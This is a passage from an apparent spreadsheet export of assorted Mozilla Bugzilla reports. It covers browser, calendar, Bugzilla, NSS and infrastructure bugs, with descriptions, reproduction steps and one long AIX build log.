Build Identifier: Mozilla/5.0 (Macintosh U PPC Mac OS X Mach-O en-US rv:1.8.0.5) Gecko/20060715 SeaMonkey/1.0.3
Using Yahoo!'s Beta Local news page with a zip code in the Sacramento/Bay Area. (In my case 94533) loads links on the News home page for the area. Under KCRA links followed from the news home page (and not the Sacramento Area page) have the tilde (~) escaped as %7E which causes the link to fail.
Example:
This link: http://us.rd.yahoo.com/dailynews/local/Sacramento/KCRA_3/SIG=13g3fh4q4_ylt=AjwPsuiw3quMek6C1MUMh9Cs0NUE_ylu=X3oDMTA3aTczb20xBHNlYwM4MTU-/*http%3A//feeds.feedburner.com/~r/kcra/local/~3/http://www.kcra.com/news/9521939/detail.html%3Frss=sac&amp;psp=news
 when followed results in this url: http://us.rd.yahoo.com/dailynews/local/Sacramento/KCRA_3/SIG=13g3fh4q4_ylt=AjwPsuiw3quMek6C1MUMh9Cs0NUE_ylu=X3oDMTA3aTczb20xBHNlYwM4MTU-/*http%3A//feeds.feedburner.com/%7Er/kcra/local/%7E3/http://www.kcra.com/news/9521939/detail.html%3Frss=sac&amp;psp=news
 which doesn't work for Yahoo! News.
Shorter links such as: http://us.rd.yahoo.com/dailynews/local/Sacramento/KCRA_3/SIG=13g3fh4q4/*http%3A//feeds.feedburner.com/~r/kcra/local/~3/http://www.kcra.com/news/9521939/detail.html%3Frss=sac&amp;psp=news work.
This is the case with both Firefox and SeaMonkey. I've tried with Safari to rule out the site itself as the problem and it works fine there.
Reproducible: Always
Steps to Reproduce:
1. Go to http://news.yahoo.com
2. Choose zip code 94533 for Yahoo! News Local beta.
3. Navigate to the KCRA tab.
4. Click a news story link under that tab.
Actual Results:  
Get an access forbidden error message.
Expected Results:  
Loading of the chosen story.</t>
  </si>
  <si>
    <t>MARKETPLACE_GRAVEYARD-798072</t>
  </si>
  <si>
    <t>[x-tags] vet accordion tag</t>
  </si>
  <si>
    <t>Make sure that this tag:
- works
- looks decently gaia-esque by default</t>
  </si>
  <si>
    <t>aschaar</t>
  </si>
  <si>
    <t>ADDONS.MOZILLA.ORG_GRAVEYARD-565183</t>
  </si>
  <si>
    <t>Personas statistics</t>
  </si>
  <si>
    <t>Personas will have a stripped down version of the stats dashboard showing ADUs over time. 
Basic mockup here: http://people.mozilla.com/~chowse/drop/amo/personas/v1/Persona_Statistics.png
Pretty sure this is dependent on Chowse's redesign of the stats dashboard so this may change. P3 so this can go out in a release or two.</t>
  </si>
  <si>
    <t>BUGZILLA-191168</t>
  </si>
  <si>
    <t>editkeywords.cgi needs more purpose/samples and link into documentation</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:1.3b) Gecko/20030114
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:1.3b) Gecko/20030114
as per http://bugzilla.mozilla.org/show_bug.cgi?id=191167 I am not so sure that
there is really significant documentation on keywords at all.
anyway it would be useful to have it to a lesser degree also in the admin-UI
(thus also in http://bugzilla.mozilla.org/editkeywords.cgi?action=add
Reproducible: Always
Steps to Reproduce:
1.
2.
3.</t>
  </si>
  <si>
    <t>CALENDAR-185744</t>
  </si>
  <si>
    <t>calendar crashes if I enter an event with a recurrance value</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (X11 U Linux i686 en-US rv:1.2.1) Gecko/20021130
Build Identifier: Mozilla/5.0 (X11 U Linux i686 en-US rv:1.2.1) Gecko/20021130
Create an event that has a recurrance and the calendar crashes and can no
longer be opened.
Reproducible: Always
Steps to Reproduce:
1. Create an event
2. Set it to recur.
3. Calendar crashes
Actual Results:  
All opened mozilla windows close.  You can open mozilla back up but cannot open
calendar.
Expected Results:  
The entry to be saved and recur.
If you modify the calendar file by removing the recurrance line it works again
but the event won't repeat.</t>
  </si>
  <si>
    <t>pgillis</t>
  </si>
  <si>
    <t>BUGZILLA-476594</t>
  </si>
  <si>
    <t>[SECURITY] Calling srand() at startup time in mod_perl makes the same token be generated over and over</t>
  </si>
  <si>
    <t>On bmo we were noticing that attachments always had the same token over and over.
We talked to the maintainer of mod_perl and he pointed out that we might be calling srand() at startup time which we are in Bugzilla::Install::Localconfig. We can fix this for now by making LOCALCONFIG_VARS into a sub instead of a constant but the right fix is to call srand() inside of a ChildInitHandler with a good seed.</t>
  </si>
  <si>
    <t>CORE-388709</t>
  </si>
  <si>
    <t>ASSERTION: Please remove this from the document properly: '!IsInDoc()' with :after floating :first-letter</t>
  </si>
  <si>
    <t>Created attachment 272890
testcase (reload to see the assertion)
Reloading or closing the testcase triggers the assertion in nsGenericDOMDataNode::~nsGenericDOMDataNode:
###!!! ASSERTION: Please remove this from the document properly: '!IsInDoc()' file mozilla/content/base/src/nsGenericDOMDataNode.cpp line 76</t>
  </si>
  <si>
    <t>BUGZILLA-188712</t>
  </si>
  <si>
    <t>Apple's Browser Safari does not support server-push</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/4.5 (compatible OmniWeb/4.1.1-v424.6 Mac_PowerPC)
Build Identifier: 
The new browser from Apple Safari does not support server-push.
Editing the buglist.cgi searching for multipart-mixed and adding to the IF statement something like 
&amp;&amp; $ENV{HTTP_USER_AGENT} !~ /Safari/
solves the problem.
Reproducible: Always
Steps to Reproduce:
1.
2.
3.</t>
  </si>
  <si>
    <t>melo</t>
  </si>
  <si>
    <t>CORE_GRAVEYARD-168066</t>
  </si>
  <si>
    <t>make Mozilla 1.2beta not suck</t>
  </si>
  <si>
    <t>This is a tracking bug for bugs that drivers@mozilla.org consider important
to the success of Mozilla 1.2beta.  Please do not change the dependencies
in this bug unless you are a driver.</t>
  </si>
  <si>
    <t>SEAMONKEY-78006</t>
  </si>
  <si>
    <t>run-mozilla.sh hangs at startup and shutdown doing md5sum</t>
  </si>
  <si>
    <t>For the last few days I've been getting very slow startups (~8 minutes) and
hangs apparently forever on shutdown.
I tracked it down to run-mozilla.sh doing checksums of the binary with md5sum
before and after it's run.
Not sure why this is suddenly taking a long time where it didn't before but
it's made the browser difficult to use (I had to hack run-mozilla.sh to pretend
not to find md5sum in order to be able to use it).
Who knows about this file and why we're doing md5sum?  Trying cls initially in
the hope that maybe he knows something about it.</t>
  </si>
  <si>
    <t>CORE-311090</t>
  </si>
  <si>
    <t>Patch for bug 310351 was mildly bogus</t>
  </si>
  <si>
    <t>My method of getting the length was incorrect for _generic_ arrays where we
can't make any assumptions about our data. Instead we should go through
javascript (and then back through XPConnect ick.</t>
  </si>
  <si>
    <t>CORE-93985</t>
  </si>
  <si>
    <t>need converter for ISO-8859-16</t>
  </si>
  <si>
    <t>ISO published ISO-8859-16 recently. We need to support the uniconde converter.</t>
  </si>
  <si>
    <t>FIREFOX_GRAVEYARD-397231</t>
  </si>
  <si>
    <t>nsMicrosummaryService leaks when loading malformed page as XML (in particular when loading file:/// HTML pages)</t>
  </si>
  <si>
    <t>Created attachment 281996
leaked objects
Steps to reproduce:
0. Create c:\1.html with malformed XML in it (e.g. aaa)
1. Open Firefox open Error Console
2. Run the following:
var uri = Components.classes[@mozilla.org/network/io-service1].getService(Components.interfaces.nsIIOService).newURI(file:///c:/1.html null null)var ms=Components.classes[@mozilla.org/microsummary/service1].getService(Components.interfaces.nsIMicrosummaryService).getMicrosummaries(uri-1)
Actual results: lots of stuff leaked exception about contains invalid XML in the Error Console
Expected: no leaks.
If I add a |this.destroy()| before the |throw| here the leaks go away:
http://bonsai.mozilla.org/cvsblame.cgi?file=/mozilla/browser/components/microsummaries/src/nsMicrosummaryService.js&amp;rev=1.75#2068
The main reason this is a problem is that microsummary code gets called when an item is selected in the places organizer. So whenever I select a file:/// place in organizer we leak.</t>
  </si>
  <si>
    <t>CORE-412025</t>
  </si>
  <si>
    <t>Need to add JSON xpt file to packages-static</t>
  </si>
  <si>
    <t>...otherwise JSON won't work in shipped builds.</t>
  </si>
  <si>
    <t>TESTOPIA-454005</t>
  </si>
  <si>
    <t>Cannot query for alias field in test cases</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1
Build Identifier: Testopia 2.0
I tried to use the XML-RPC interface using TestCase.list method to list all testcases with a specific alias. Unfortunately the query silently ignored the alias specification and returned all test cases.
I drilled down to Testopia::Search module which seem to miss the 'alias' filed. I've attached a proposed patch.
Reproducible: Always
Steps to Reproduce:
1.
2.
3.</t>
  </si>
  <si>
    <t>i.turturica</t>
  </si>
  <si>
    <t>MAILNEWS_CORE-524934</t>
  </si>
  <si>
    <t>Identity settings dialog is too small</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 6.1 fr rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3
Build Identifier: Mozilla/5.0 (Windows U Windows NT 6.1 fr rv:1.9.1.4pre) Gecko/20090915 Thunderbird/3.0b4
The dialog of Identity settings is not wide enough : I can't see the text at the right. See screenshot http://chtitux.org/vrac/param%20ident%20tb3-b4.png
Reproducible: Always
Steps to Reproduce:
1. Open Thunderbird 3b4
2. Open the Identity settings dialog
3. It's there
Actual Results:  
The dialog is too small
I use TB3b4 with French language.</t>
  </si>
  <si>
    <t>chtitux</t>
  </si>
  <si>
    <t>FIREFOX-312036</t>
  </si>
  <si>
    <t>history.dat contains entries deleted from the date and site view</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (X11 U Linux i686 de-DE rv:1.7.12) Gecko/20050922 Fedora/1.0.7-1.1.fc4 Firefox/1.0.7
Build Identifier: Mozilla/5.0 (X11 U Linux i686 de-DE rv:1.7.12) Gecko/20050922 Fedora/1.0.7-1.1.fc4 Firefox/1.0.7
If I visit for example www.google.com and remove this site from the history
sidebar afterwards  the URL won't be visible in the address bar or in any
history list as expected.
BUT it can still be found by greping the users configuration files. Use this
command for validation
# grep -ri google ~/.mozilla/firefox
Reproducible: Always
Steps to Reproduce:
1. visit an arbitrary site
2. remove this site from the history sidebar
3. grep your configuration directory with the command specified above
Actual Results:  
site is still visible in history.dat and other files
Expected Results:  
site should not exist any longer in any files (except cache files maybe)
I've reported this bug long before firexox existed with the mozilla browser.
They have resolved the problem very quickly. Unfortunately I don't remember how
(I think is was something like a compressed commit or compressed submit  or
something like that)
By the way: in moziilla's case the problem only existed when removing some
entries explicitly in the sidebar or in the history window. It didn't happen
when pressing clear all.</t>
  </si>
  <si>
    <t>uzsmwd</t>
  </si>
  <si>
    <t>MOZILLA.ORG_GRAVEYARD-831054</t>
  </si>
  <si>
    <t>Investigate be2net issues</t>
  </si>
  <si>
    <t>It seems that it's that time of the year when yet another NIC driver has issues.
Seen already on 3 different blades (different chassis) but with this in common:
ProLiant BL460c G7
BIOS 05/05/2011 - one release behind but the latest revision doesn't address anything related to our issue
kernel 2.6.32-279.19.1.el6.x86_64 #1 SMP Sat Nov 24 14:35:28 EST 2012 x86_64 x86_64 x86_64 GNU/Linux - latest
be2net driver version 4.1.307r
RHEL 6
In the logs there's only:
kernel: do_IRQ: x.xxx No irq handler for vector (irq -1)</t>
  </si>
  <si>
    <t>BUGZILLA-180444</t>
  </si>
  <si>
    <t>Request tracker misattributes requests redirected to new requestees</t>
  </si>
  <si>
    <t>Request initially was nonspecific then bacame directed.  The notification to
reviewers indicated that the original requester had assigned the request to the
new requestee even though the requestee was assigned by someone else.
justdave@netscape.com  set Attachment #106465 Flag  review?(justdave)  --&gt;
review+ review?    
then
bugreport@peshkin.net  set    Attachment #106465 Flag  review?  --&gt; review?(bbaetz)
The email to reviewers went out stating that justdave had asked bbaetz rather
than either justdave asking the wind or bugreport@peshkinnet asking bbaetz.</t>
  </si>
  <si>
    <t>CORE-354075</t>
  </si>
  <si>
    <t>Complete move from toolkit/components/gnome to toolkit/system/gnome</t>
  </si>
  <si>
    <t>We need to fix up the build system to use toolkit/system/gnome and then CVS remove the unneeded files.</t>
  </si>
  <si>
    <t>CORE_GRAVEYARD-277342</t>
  </si>
  <si>
    <t>JS Console behaving incorrectly with right-click on source file</t>
  </si>
  <si>
    <t>Error: Selector expected.  Ruleset ignored due to bad selector.
Source File: http://www.google.com/
Line: 5
Right-clicking http://www.google.com immediately brings up the source instead
of a context menu.</t>
  </si>
  <si>
    <t>error-console</t>
  </si>
  <si>
    <t>WWW.MOZILLA.ORG-261582</t>
  </si>
  <si>
    <t>[404] link to http://www.mozilla.org/quality/qacontacts.html</t>
  </si>
  <si>
    <t>404: File Not Found
/quality/qacontacts.html
We are sorry the file you requested could not be found.
Referring page:
http://www.mozilla.org/quality/browser/front-end/</t>
  </si>
  <si>
    <t>mike.wake</t>
  </si>
  <si>
    <t>CALENDAR-286841</t>
  </si>
  <si>
    <t>Minimonth showMonth is called twice when month changes</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:1.7.5) Gecko/20041107 Firefox/1.0
Build Identifier: 
Minimonth showMonth is called twice whenever displayed month changes.
The methods advanceMonth switchMonth and switchYear all set this.value and
call showMonth but this.value is a property whose onSet handler calls update
which calls showMonth so those methods should not make a duplicate call to
showMonth.  
Those methods also clear mSelected's selected property but showMonth also does
that.  
Finally those methods all call the onmonthchanged handler but show month could
detect changed months and do that as well eliminating more duplicated code.
Reproducible: Always
Steps to Reproduce:</t>
  </si>
  <si>
    <t>FIREFOX-398807</t>
  </si>
  <si>
    <t>session restore accounts for 2-3% of talos pageload (make it faster)</t>
  </si>
  <si>
    <t>We disabled session restore on the trunk for a bit and watched the perf boxes.
This means whatever session store is doing is really slow since its timeout doesn't fire for every page. The page that happens to load with the session store activity probably gets a much larger regression.</t>
  </si>
  <si>
    <t>NSPR-72965</t>
  </si>
  <si>
    <t>PR_Poll can time out even when data is available</t>
  </si>
  <si>
    <t>We have a race condition in the PR_Poll code now which can cause it to behave as 
if no data is available on the socket even when there is data. This causes 
stalls in downloads for HTTP (see bug 60509) which are as long as the poll 
timeout (35 seconds in Necko).
I've established using instrumentation that the problem occurs when the Notifier 
fires before we've put the polling thread to sleep (a classic threaded I/O race 
condition).</t>
  </si>
  <si>
    <t>CORE-325666</t>
  </si>
  <si>
    <t>clean up #includes in Cocoa nsToolkit</t>
  </si>
  <si>
    <t>We should clean up #includes in Cocoa nsToolkit.</t>
  </si>
  <si>
    <t>CORE-367768</t>
  </si>
  <si>
    <t>update cairo to 1.3.12 snapshot (2007-01-20)</t>
  </si>
  <si>
    <t>Update cairo to 1.3.12 snapshot.</t>
  </si>
  <si>
    <t>MOZILLA_LOCALIZATIONS-385186</t>
  </si>
  <si>
    <t>Thunderbird builds with some errors for Linux &amp; MAC and fails for Windows</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 ka-GE rv:1.8.1.2) Gecko/20070222 SeaMonkey/1.1.1
Build Identifier: 
There are some errors while building Georgian (ka) Thunderbird for Linux &amp; MAC and fails for Windows for MOZILLA_1.8_BRANCH.
For eliminating minor errors 'mail/chrome' must updated/synchronized/'cleaned'
Seems critical error is Georgian updater.ini and \installer files - it will be English for this stage.
Patch/diff [will be] attached
Reproducible: Always
Steps to Reproduce:
1.
2.
3.</t>
  </si>
  <si>
    <t>MOZILLA.ORG_GRAVEYARD-460498</t>
  </si>
  <si>
    <t>Access to nagios</t>
  </si>
  <si>
    <t>Hi
Could I please get access to see the release machines on nagios?
Thanks</t>
  </si>
  <si>
    <t>FIREFOX-328600</t>
  </si>
  <si>
    <t>Option for mailto: links to go to a web based e-mail client (webmail service)</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.7.12) Gecko/20050915 Firefox/1.0.7 (ax)
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.7.12) Gecko/20050915 Firefox/1.0.7 (ax)
Firefox currently supports a wide number of stand alone e-mail applications (including it's own Thunderbird client) when an e-mail link is clicked on in Firefox.  To the best of my knowledge it still does not support web based e-mail clients such as g-mail in this fashion.
The idea is that if one prefers to use a web based e-mail account they should have the option to configure firefox to log into that web based e-mail account and open a compose new message window.
I understand this may require some colaboration with the popular web based e-mail services such as gmail and aim mail but I think it would be worth the benifit.
Reproducible: Always</t>
  </si>
  <si>
    <t>nmeryash</t>
  </si>
  <si>
    <t>MOZILLA.ORG_GRAVEYARD-508491</t>
  </si>
  <si>
    <t>Set up QMO Bugzilla cron for QMO stage</t>
  </si>
  <si>
    <t>As per bug 499361 the QMO Bugzilla module is now enabled and working on QMO stage. Next step is setting up its cron to run.
The file should be in the website root named cron-qmo_bugzilla.php</t>
  </si>
  <si>
    <t>CORE-465691</t>
  </si>
  <si>
    <t>Crashes in thebes.dll when not able to match the font</t>
  </si>
  <si>
    <t>I see quite a few crashes in SeaMonkey (comm-central 20081118122900) it was reproducible for me with a default profile on . I finally traced it down to a NULL pattern that is returned when a font pattern cannot be matched in gfxOS2Font::CairoFontFace.
I now made FontConfig in mzfntcfgft more crash safe so this shouldn't occur any longer if linked against the newest code from . But we still should fix the gfxOS2Font class too.
Could be that this is related to bug 449727 even though the debugging output shows something different.</t>
  </si>
  <si>
    <t>NSS-111293</t>
  </si>
  <si>
    <t>cmmfrec.c: Operation between types struct CERTCertificateStr* and int is not allowed.</t>
  </si>
  <si>
    <t>error showed up after changes for PSM to compile against NSS shared libraries.
Move SSL and S/MIME to the new common MAPFILE usage
gmake[2]: Entering directory
`/export/nss_tbx_aix64/builds/tinderbox/AIX64/mozilla/security/nss/lib/smime'
xlC_r -o AIX4.3_64_DBG.OBJ/cmsarray.o -c -g -DAIX -DSYSV -qarch=com -DAIX_64BIT
-DAIX4_3 -DXP_UNIX -DDEBUG -UNDEBUG -DDEBUG_svbld
-I../../../../dist/AIX4.3_64_DBG.OBJ/include  -I../../../../dist/public/security
-I../../../../dist/private/security -I../../../../dist/public/security
-I../../../../dist/public/dbm  cmsarray.c
xlC_r -o AIX4.3_64_DBG.OBJ/cmsasn1.o -c -g -DAIX -DSYSV -qarch=com -DAIX_64BIT
-DAIX4_3 -DXP_UNIX -DDEBUG -UNDEBUG -DDEBUG_svbld
-I../../../../dist/AIX4.3_64_DBG.OBJ/include  -I../../../../dist/public/security
-I../../../../dist/private/security -I../../../../dist/public/security
-I../../../../dist/public/dbm  cmsasn1.c
xlC_r -o AIX4.3_64_DBG.OBJ/cmsattr.o -c -g -DAIX -DSYSV -qarch=com -DAIX_64BIT
-DAIX4_3 -DXP_UNIX -DDEBUG -UNDEBUG -DDEBUG_svbld
-I../../../../dist/AIX4.3_64_DBG.OBJ/include  -I../../../../dist/public/security
-I../../../../dist/private/security -I../../../../dist/public/security
-I../../../../dist/public/dbm  cmsattr.c
xlC_r -o AIX4.3_64_DBG.OBJ/cmscinfo.o -c -g -DAIX -DSYSV -qarch=com -DAIX_64BIT
-DAIX4_3 -DXP_UNIX -DDEBUG -UNDEBUG -DDEBUG_svbld
-I../../../../dist/AIX4.3_64_DBG.OBJ/include  -I../../../../dist/public/security
-I../../../../dist/private/security -I../../../../dist/public/security
-I../../../../dist/public/dbm  cmscinfo.c
xlC_r -o AIX4.3_64_DBG.OBJ/cmscipher.o -c -g -DAIX -DSYSV -qarch=com -DAIX_64BIT
-DAIX4_3 -DXP_UNIX -DDEBUG -UNDEBUG -DDEBUG_svbld
-I../../../../dist/AIX4.3_64_DBG.OBJ/include  -I../../../../dist/public/security
-I../../../../dist/private/security -I../../../../dist/public/security
-I../../../../dist/public/dbm  cmscipher.c
xlC_r -o AIX4.3_64_DBG.OBJ/cmsdecode.o -c -g -DAIX -DSYSV -qarch=com -DAIX_64BIT
-DAIX4_3 -DXP_UNIX -DDEBUG -UNDEBUG -DDEBUG_svbld
-I../../../../dist/AIX4.3_64_DBG.OBJ/include  -I../../../../dist/public/security
-I../../../../dist/private/security -I../../../../dist/public/security
-I../../../../dist/public/dbm  cmsdecode.c
xlC_r -o AIX4.3_64_DBG.OBJ/cmsdigdata.o -c -g -DAIX -DSYSV -qarch=com
-DAIX_64BIT -DAIX4_3 -DXP_UNIX -DDEBUG -UNDEBUG -DDEBUG_svbld
-I../../../../dist/AIX4.3_64_DBG.OBJ/include  -I../../../../dist/public/security
-I../../../../dist/private/security -I../../../../dist/public/security
-I../../../../dist/public/dbm  cmsdigdata.c
xlC_r -o AIX4.3_64_DBG.OBJ/cmsdigest.o -c -g -DAIX -DSYSV -qarch=com -DAIX_64BIT
-DAIX4_3 -DXP_UNIX -DDEBUG -UNDEBUG -DDEBUG_svbld
-I../../../../dist/AIX4.3_64_DBG.OBJ/include  -I../../../../dist/public/security
-I../../../../dist/private/security -I../../../../dist/public/security
-I../../../../dist/public/dbm  cmsdigest.c
xlC_r -o AIX4.3_64_DBG.OBJ/cmsencdata.o -c -g -DAIX -DSYSV -qarch=com
-DAIX_64BIT -DAIX4_3 -DXP_UNIX -DDEBUG -UNDEBUG -DDEBUG_svbld
-I../../../../dist/AIX4.3_64_DBG.OBJ/include  -I../../../../dist/public/security
-I../../../../dist/private/security -I../../../../dist/public/security
-I../../../../dist/public/dbm  cmsencdata.c
xlC_r -o AIX4.3_64_DBG.OBJ/cmsencode.o -c -g -DAIX -DSYSV -qarch=com -DAIX_64BIT
-DAIX4_3 -DXP_UNIX -DDEBUG -UNDEBUG -DDEBUG_svbld
-I../../../../dist/AIX4.3_64_DBG.OBJ/include  -I../../../../dist/public/security
-I../../../../dist/private/security -I../../../../dist/public/security
-I../../../../dist/public/dbm  cmsencode.c
xlC_r -o AIX4.3_64_DBG.OBJ/cmsenvdata.o -c -g -DAIX -DSYSV -qarch=com
-DAIX_64BIT -DAIX4_3 -DXP_UNIX -DDEBUG -UNDEBUG -DDEBUG_svbld
-I../../../../dist/AIX4.3_64_DBG.OBJ/include  -I../../../../dist/public/security
-I../../../../dist/private/security -I../../../../dist/public/security
-I../../../../dist/public/dbm  cmsenvdata.c
xlC_r -o AIX4.3_64_DBG.OBJ/cmsmessage.o -c -g -DAIX -DSYSV -qarch=com
-DAIX_64BIT -DAIX4_3 -DXP_UNIX -DDEBUG -UNDEBUG -DDEBUG_svbld
-I../../../../dist/AIX4.3_64_DBG.OBJ/include  -I../../../../dist/public/security
-I../../../../dist/private/security -I../../../../dist/public/security
-I../../../../dist/public/dbm  cmsmessage.c
xlC_r -o AIX4.3_64_DBG.OBJ/cmspubkey.o -c -g -DAIX -DSYSV -qarch=com -DAIX_64BIT
-DAIX4_3 -DXP_UNIX -DDEBUG -UNDEBUG -DDEBUG_svbld
-I../../../../dist/AIX4.3_64_DBG.OBJ/include  -I../../../../dist/public/security
-I../../../../dist/private/security -I../../../../dist/public/security
-I../../../../dist/public/dbm  cmspubkey.c
xlC_r -o AIX4.3_64_DBG.OBJ/cmsrecinfo.o -c -g -DAIX -DSYSV -qarch=com
-DAIX_64BIT -DAIX4_3 -DXP_UNIX -DDEBUG -UNDEBUG -DDEBUG_svbld
-I../../../../dist/AIX4.3_64_DBG.OBJ/include  -I../../../../dist/public/security
-I../../../../dist/private/security -I../../../../dist/public/security
-I../../../../dist/public/dbm  cmsrecinfo.c
xlC_r -o AIX4.3_64_DBG.OBJ/cmsreclist.o -c -g -DAIX -DSYSV -qarch=com
-DAIX_64BIT -DAIX4_3 -DXP_UNIX -DDEBUG -UNDEBUG -DDEBUG_svbld
-I../../../../dist/AIX4.3_64_DBG.OBJ/include  -I../../../../dist/public/security
-I../../../../dist/private/security -I../../../../dist/public/security
-I../../../../dist/public/dbm  cmsreclist.c
xlC_r -o AIX4.3_64_DBG.OBJ/cmssigdata.o -c -g -DAIX -DSYSV -qarch=com
-DAIX_64BIT -DAIX4_3 -DXP_UNIX -DDEBUG -UNDEBUG -DDEBUG_svbld
-I../../../../dist/AIX4.3_64_DBG.OBJ/include  -I../../../../dist/public/security
-I../../../../dist/private/security -I../../../../dist/public/security
-I../../../../dist/public/dbm  cmssigdata.c
xlC_r -o AIX4.3_64_DBG.OBJ/cmssiginfo.o -c -g -DAIX -DSYSV -qarch=com
-DAIX_64BIT -DAIX4_3 -DXP_UNIX -DDEBUG -UNDEBUG -DDEBUG_svbld
-I../../../../dist/AIX4.3_64_DBG.OBJ/include  -I../../../../dist/public/security
-I../../../../dist/private/security -I../../../../dist/public/security
-I../../../../dist/public/dbm  cmssiginfo.c
xlC_r -o AIX4.3_64_DBG.OBJ/cmsutil.o -c -g -DAIX -DSYSV -qarch=com -DAIX_64BIT
-DAIX4_3 -DXP_UNIX -DDEBUG -UNDEBUG -DDEBUG_svbld
-I../../../../dist/AIX4.3_64_DBG.OBJ/include  -I../../../../dist/public/security
-I../../../../dist/private/security -I../../../../dist/public/security
-I../../../../dist/public/dbm  cmsutil.c
xlC_r -o AIX4.3_64_DBG.OBJ/smimemessage.o -c -g -DAIX -DSYSV -qarch=com
-DAIX_64BIT -DAIX4_3 -DXP_UNIX -DDEBUG -UNDEBUG -DDEBUG_svbld
-I../../../../dist/AIX4.3_64_DBG.OBJ/include  -I../../../../dist/public/security
-I../../../../dist/private/security -I../../../../dist/public/security
-I../../../../dist/public/dbm  smimemessage.c
xlC_r -o AIX4.3_64_DBG.OBJ/smimeutil.o -c -g -DAIX -DSYSV -qarch=com -DAIX_64BIT
-DAIX4_3 -DXP_UNIX -DDEBUG -UNDEBUG -DDEBUG_svbld
-I../../../../dist/AIX4.3_64_DBG.OBJ/include  -I../../../../dist/public/security
-I../../../../dist/private/security -I../../../../dist/public/security
-I../../../../dist/public/dbm  smimeutil.c
xlC_r -o AIX4.3_64_DBG.OBJ/smimever.o -c -g -DAIX -DSYSV -qarch=com -DAIX_64BIT
-DAIX4_3 -DXP_UNIX -DDEBUG -UNDEBUG -DDEBUG_svbld
-I../../../../dist/AIX4.3_64_DBG.OBJ/include  -I../../../../dist/public/security
-I../../../../dist/private/security -I../../../../dist/public/security
-I../../../../dist/public/dbm  smimever.c
rm -f AIX4.3_64_DBG.OBJ/libsmime.a
ar cr AIX4.3_64_DBG.OBJ/libsmime.a AIX4.3_64_DBG.OBJ/cmsarray.o
AIX4.3_64_DBG.OBJ/cmsasn1.o AIX4.3_64_DBG.OBJ/cmsattr.o
AIX4.3_64_DBG.OBJ/cmscinfo.o AIX4.3_64_DBG.OBJ/cmscipher.o
AIX4.3_64_DBG.OBJ/cmsdecode.o AIX4.3_64_DBG.OBJ/cmsdigdata.o
AIX4.3_64_DBG.OBJ/cmsdigest.o AIX4.3_64_DBG.OBJ/cmsencdata.o
AIX4.3_64_DBG.OBJ/cmsencode.o AIX4.3_64_DBG.OBJ/cmsenvdata.o
AIX4.3_64_DBG.OBJ/cmsmessage.o AIX4.3_64_DBG.OBJ/cmspubkey.o
AIX4.3_64_DBG.OBJ/cmsrecinfo.o AIX4.3_64_DBG.OBJ/cmsreclist.o
AIX4.3_64_DBG.OBJ/cmssigdata.o AIX4.3_64_DBG.OBJ/cmssiginfo.o
AIX4.3_64_DBG.OBJ/cmsutil.o AIX4.3_64_DBG.OBJ/smimemessage.o
AIX4.3_64_DBG.OBJ/smimeutil.o AIX4.3_64_DBG.OBJ/smimever.o
ranlib AIX4.3_64_DBG.OBJ/libsmime.a
grep -v '+' smime.def | grep -v '-' | sed -e 's DATA ' -e 's' -e
's.*' &gt; AIX4.3_64_DBG.OBJ/smime.def
rm -f AIX4.3_64_DBG.OBJ/libsmime3.so
ld -brtl -bM:SRE -bnoentry -bexport:AIX4.3_64_DBG.OBJ/smime.def -lsvld
-L/usr/lpp/xlC/lib -lc -lm -o AIX4.3_64_DBG.OBJ/libsmime3.so
AIX4.3_64_DBG.OBJ/cmsarray.o AIX4.3_64_DBG.OBJ/cmsasn1.o
AIX4.3_64_DBG.OBJ/cmsattr.o AIX4.3_64_DBG.OBJ/cmscinfo.o
AIX4.3_64_DBG.OBJ/cmscipher.o AIX4.3_64_DBG.OBJ/cmsdecode.o
AIX4.3_64_DBG.OBJ/cmsdigdata.o AIX4.3_64_DBG.OBJ/cmsdigest.o
AIX4.3_64_DBG.OBJ/cmsencdata.o AIX4.3_64_DBG.OBJ/cmsencode.o
AIX4.3_64_DBG.OBJ/cmsenvdata.o AIX4.3_64_DBG.OBJ/cmsmessage.o
AIX4.3_64_DBG.OBJ/cmspubkey.o AIX4.3_64_DBG.OBJ/cmsrecinfo.o
AIX4.3_64_DBG.OBJ/cmsreclist.o AIX4.3_64_DBG.OBJ/cmssigdata.o
AIX4.3_64_DBG.OBJ/cmssiginfo.o AIX4.3_64_DBG.OBJ/cmsutil.o
AIX4.3_64_DBG.OBJ/smimemessage.o AIX4.3_64_DBG.OBJ/smimeutil.o
AIX4.3_64_DBG.OBJ/smimever.o ../pkcs12/AIX4.3_64_DBG.OBJ/p12local.o
../pkcs12/AIX4.3_64_DBG.OBJ/p12creat.o ../pkcs12/AIX4.3_64_DBG.OBJ/p12dec.o
../pkcs12/AIX4.3_64_DBG.OBJ/p12plcy.o ../pkcs12/AIX4.3_64_DBG.OBJ/p12tmpl.o
../pkcs12/AIX4.3_64_DBG.OBJ/p12e.o .!
./pkcs12/
AIX4.3_64_DBG.OBJ/p12d.o ../pkcs7/AIX4.3_64_DBG.OBJ/certread.o
../pkcs7/AIX4.3_64_DBG.OBJ/p7common.o ../pkcs7/AIX4.3_64_DBG.OBJ/p7create.o
../pkcs7/AIX4.3_64_DBG.OBJ/p7decode.o ../pkcs7/AIX4.3_64_DBG.OBJ/p7encode.o
../pkcs7/AIX4.3_64_DBG.OBJ/p7local.o ../pkcs7/AIX4.3_64_DBG.OBJ/secmime.o  
-L../../../../dist/AIX4.3_64_DBG.OBJ/lib/ -lnss3 -lplc4 -lplds4 -lnspr4 
ld: 0711-224 WARNING: Duplicate symbol: .bcopy
ld: 0711-224 WARNING: Duplicate symbol: .memmove
